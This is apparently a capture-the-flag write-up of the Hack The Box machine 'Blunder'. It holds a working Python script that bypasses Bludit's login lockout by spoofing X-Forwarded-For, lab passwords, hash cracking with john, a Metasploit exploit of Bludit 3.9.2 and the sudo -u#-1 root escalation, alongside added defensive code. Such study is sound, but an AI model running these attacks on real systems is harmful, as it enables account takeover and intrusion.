[hackthebox]Blunder


This is a Linux machine rated easy; in fact, it was only easy once I had the correct parameters to exploit the CVEs.

NMAP

Unlike other Linux HTB machines, this one does not expose SSH; only the HTTP service is open.
nmap -sV -sC -vvv -oN blunder 10.10.10.191

Nmap scan report for 10.10.10.191
Host is up, received syn-ack (0.18s latency).
Scanned at 2020-06-01 15:58:17 +08 for 29s
Not shown: 998 filtered ports
Reason: 998 no-responses
PORT   STATE  SERVICE REASON       VERSION
21/tcp closed ftp     conn-refused
80/tcp open   http    syn-ack      Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: A0F0E5D852F0E3783AF700B6EE9D00DA
|_http-generator: Blunder
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jun  1 15:58:46 2020 -- 1 IP address (1 host up) scanned in 30.34 seconds

Looking at the web

This is a static page and there is not much interesting at first glance.

Web enumeration with gobuster found a todo.txt.

gobuster dir -u http://10.10.10.191 -x .php,.txt -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -o ~/htb/blunder/go3 --timeout 60s -t 30


Apart from this text file, there is an admin directory which is a login page.

From the todo.txt, a username – fergus – is found.

The password is within the main page, so I used cewl -d 2 -m 5 -w dict.txt http://10.10.10.191/ to generate a wordlist from it.

Bludit has a lockout feature which “prevents” bruteforcing. On the web I found a Python script which can be used to bypass the bruteforce protection.

Finding fergus's password for Bludit

This is the modified python code which is used for Blunder.

#!/usr/bin/env python3
# https://rastating.github.io/bludit-brute-force-mitigation-bypass/
import re
import requests

filepath = "/home/cyruslab/htb/blunder/dict.txt"
host = 'http://10.10.10.191'
login_url = host + '/admin/'
username = 'fergus'

# Load the cewl-generated wordlist, skipping blank lines.
with open(filepath, "r") as f:
    wordlist = [line for line in f.read().split("\n") if line]

for password in wordlist:
    # A fresh session per attempt, so each request carries its own cookie and CSRF token.
    session = requests.Session()
    login_page = session.get(login_url)
    csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)

    print('[*] Trying: {p}'.format(p=password))

    # X-Forwarded-For carries a different value on every attempt.
    headers = {
        'X-Forwarded-For': password,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
        'Referer': login_url
    }

    data = {
        'tokenCSRF': csrf_token,
        'username': username,
        'password': password,
        'save': ''
    }

    login_result = session.post(login_url, headers=headers, data=data, allow_redirects=False)

    # A redirect to the dashboard means the login succeeded.
    if 'location' in login_result.headers:
        if '/admin/dashboard' in login_result.headers['location']:
            print()
            print('SUCCESS: Password found!')
            print('Use {u}:{p} to login.'.format(u=username, p=password))
            print()
            break

Running the script found a matching password for fergus.

SUCCESS: Password found!
Use fergus:RolandDeschain to login.
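
Why a new X-Forwarded-For value on every request defeats the lockout, and what a fix looks like, as an added example (not Bludit's code and not from the original post): a simplified failure counter keyed first on the client-supplied header and then on the TCP peer address. The threshold, the proxy address and all names in it are assumptions made for the illustration.

```python
import ipaddress
from collections import defaultdict

MAX_FAILURES = 10                                      # assumed lockout threshold
TRUSTED_PROXIES = {ipaddress.ip_address("10.0.0.5")}   # hypothetical reverse proxy

def naive_client_key(peer_ip, headers):
    """Weak: the lockout key is whatever the client put in X-Forwarded-For."""
    return headers.get("X-Forwarded-For", peer_ip)

def hardened_client_key(peer_ip, headers):
    """Key on the TCP peer; honour X-Forwarded-For only when a known proxy
    sent the request and the last hop parses as an IP address."""
    peer = ipaddress.ip_address(peer_ip)
    if peer in TRUSTED_PROXIES:
        last_hop = headers.get("X-Forwarded-For", "").split(",")[-1].strip()
        try:
            return str(ipaddress.ip_address(last_hop))
        except ValueError:
            pass                                       # not an address: ignore the header
    return str(peer)

class Lockout:
    def __init__(self, key_func):
        self.key_func = key_func
        self.failures = defaultdict(int)

    def attempt(self, peer_ip, headers, ok):
        """Return 'blocked', 'ok' or 'failed' for one login attempt."""
        key = self.key_func(peer_ip, headers)
        if self.failures[key] >= MAX_FAILURES:
            return "blocked"
        if ok:
            self.failures.pop(key, None)
            return "ok"
        self.failures[key] += 1
        return "failed"

def replay(key_func, guesses, peer_ip="203.0.113.7"):
    """Replay failed logins whose X-Forwarded-For equals the guess, as in the
    script above; return how many guesses were evaluated before blocking."""
    guard = Lockout(key_func)
    results = [guard.attempt(peer_ip, {"X-Forwarded-For": g}, ok=False) for g in guesses]
    return sum(r != "blocked" for r in results)

GUESSES = ["word%03d" % i for i in range(200)]         # constructed sample wordlist

if __name__ == "__main__":
    print("header-keyed lockout evaluated:", replay(naive_client_key, GUESSES))
    print("peer-keyed lockout evaluated:  ", replay(hardened_client_key, GUESSES))
```

A failure counter kept per username as well as per address closes the same gap when many clients share one address.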

Exploit bludit

With the username and password, I used Metasploit's module to exploit the vulnerability in Bludit version 3.9.2.
The version of Bludit was revealed when enumerating and testing with Burp Suite.

The exploit can be located with searchsploit.

The module to exploit Bludit 3.9.2 is also available in my Metasploit version.

After setting the username, the password and Bludit's IP address, the exploit executed successfully.

Get the user flag

First, I upgraded the shell to /bin/bash.

There are two users' home directories.

The user flag is in hugo's directory, so the first step is to find hugo's password.

Searching the server, I found hugo's password hash in users.php under the directory /var/www/bludit-3.10.0a/bl-content/databases.

With john the hash was cracked and password of hugo was found to be Password120.

$john -rules --wordlist=/usr/share/wordlists/rockyou.txt hugo.hash
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "Raw-SHA1-AxCrypt"
Use the "--format=Raw-SHA1-AxCrypt" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "Raw-SHA1-Linkedin"
Use the "--format=Raw-SHA1-Linkedin" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "ripemd-160"
Use the "--format=ripemd-160" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "has-160"
Use the "--format=has-160" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 256/256 AVX2 8x])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
Password120      (?)
1g 0:00:00:02 DONE (2020-06-02 18:46) 0.3745g/s 6238Kp/s 6238Kc/s 6238KC/s Password125..Password1122
Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably
Session completed

After changing user to hugo, the user flag is obtained.

Privilege escalation to root

Hugo's sudo privilege is shown in a screenshot that is not reproduced here.

This configuration has a vulnerability which can be exploited.

Running /bin/bash through sudo as user #-1 gives a root shell.
sudo -u#-1 /bin/bash -i
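
The sudoers rule behind this step is only in the screenshot, so the following added example (not from the original post) assumes the rule shape that a -u#-1 invocation is aimed at: a Runas list that grants ALL and then negates root. It audits sudoers text, or sudo -l output, for such rules; the sample rules and the function name are constructed for the illustration.

```python
import re

RUNAS = re.compile(r"\(([^)]*)\)")             # "(user list[: group list])"
COMMENT = re.compile(r"#(?!-?\d|include).*")   # '#' is a comment unless it is a uid or an include

def risky_runas_rules(text):
    """Return rules whose Runas user list grants ALL and then negates entries.

    Where sudo resolves a numeric ID of -1 to UID 0, as the command above
    relies on, such a rule does not keep the user out of root."""
    findings = []
    joined = re.sub(r"\\\n", " ", text)         # fold backslash-continued lines
    for line in joined.splitlines():
        rule = " ".join(COMMENT.sub("", line).split())
        if not rule or rule.startswith("Defaults"):
            continue
        for match in RUNAS.finditer(rule):
            users = [u.strip() for u in match.group(1).split(":")[0].split(",")]
            if "ALL" in users and any(u.startswith("!") for u in users):
                findings.append(rule)
                break
    return findings

# Constructed sample, not taken from the target host.
SAMPLE_SUDOERS = r"""
# constructed sudoers fragment
alice ALL=(ALL, !root) /bin/bash
bob   ALL=(ALL : ALL) ALL
carol ALL=(www-data) NOPASSWD: /usr/bin/systemctl reload apache2
dave  ALL=(ALL, \
      !root, !#1000) /usr/bin/vi
"""

if __name__ == "__main__":
    for rule in risky_runas_rules(SAMPLE_SUDOERS):
        print("review:", rule)
```

Rules it reports are better rewritten to name the permitted target users explicitly instead of subtracting root from ALL.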

Other discovery

There are two screenshots in shaun's home folder. I assumed shaun's identity with:
sudo -u shaun /bin/bash -i

One of the two screenshots looked interesting, but it is a rabbit hole, because the root.txt is always randomized.
